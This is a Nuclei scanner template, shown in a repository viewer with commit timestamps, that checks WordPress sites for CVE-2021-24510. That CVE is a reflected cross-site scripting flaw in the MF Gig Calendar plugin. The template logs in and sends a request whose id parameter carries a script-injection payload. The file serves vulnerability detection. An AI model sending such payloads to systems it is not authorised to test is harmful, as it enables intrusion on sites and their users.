nuclei-templates/cves/2021/CVE-2021-24510.yaml

49 lines
1.5 KiB
YAML
Raw Normal View History

2022-02-04 19:18:10 +00:00
id: CVE-2021-24510
info:
name: MF Gig Calendar <= 1.1 - Reflected Cross-Site Scripting (XSS)
author: dhiyaneshDK
severity: medium
2022-02-08 18:29:45 +00:00
description: The MF Gig Calendar WordPress plugin through 1.1 does not sanitise or escape the id GET parameter before outputting back in the admin dashboard when editing an Event, leading to a reflected Cross-Site Scripting issue
reference:
- https://wpscan.com/vulnerability/715721b0-13a1-413a-864d-2380f38ecd39
- https://nvd.nist.gov/vuln/detail/CVE-2021-24510
2022-02-04 19:18:10 +00:00
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2021-24510
cwe-id: CWE-79
tags: wordpress,cve,cve2021,wp-plugin,authenticated
requests:
2022-02-04 19:35:57 +00:00
- raw:
2022-02-04 19:18:10 +00:00
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Origin: {{RootURL}}
Content-Type: application/x-www-form-urlencoded
Cookie: wordpress_test_cookie=WP%20Cookie%20check
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
- |
2022-02-08 18:29:45 +00:00
GET /wp-admin/admin.php?page=mf_gig_calendar&action=edit&id="></script><script>alert(document.domain)</script><" HTTP/1.1
2022-02-04 19:18:10 +00:00
Host: {{Hostname}}
2022-02-08 18:29:45 +00:00
cookie-reuse: true
2022-02-04 19:18:10 +00:00
matchers-condition: and
matchers:
- type: word
part: body
2022-02-08 18:29:45 +00:00
words:
- '</script><script>alert(document.domain)</script>'
2022-02-04 19:18:10 +00:00
- type: status
status:
- 200
- type: word
2022-02-08 18:29:45 +00:00
part: header
2022-02-04 19:18:10 +00:00
words:
- "text/html"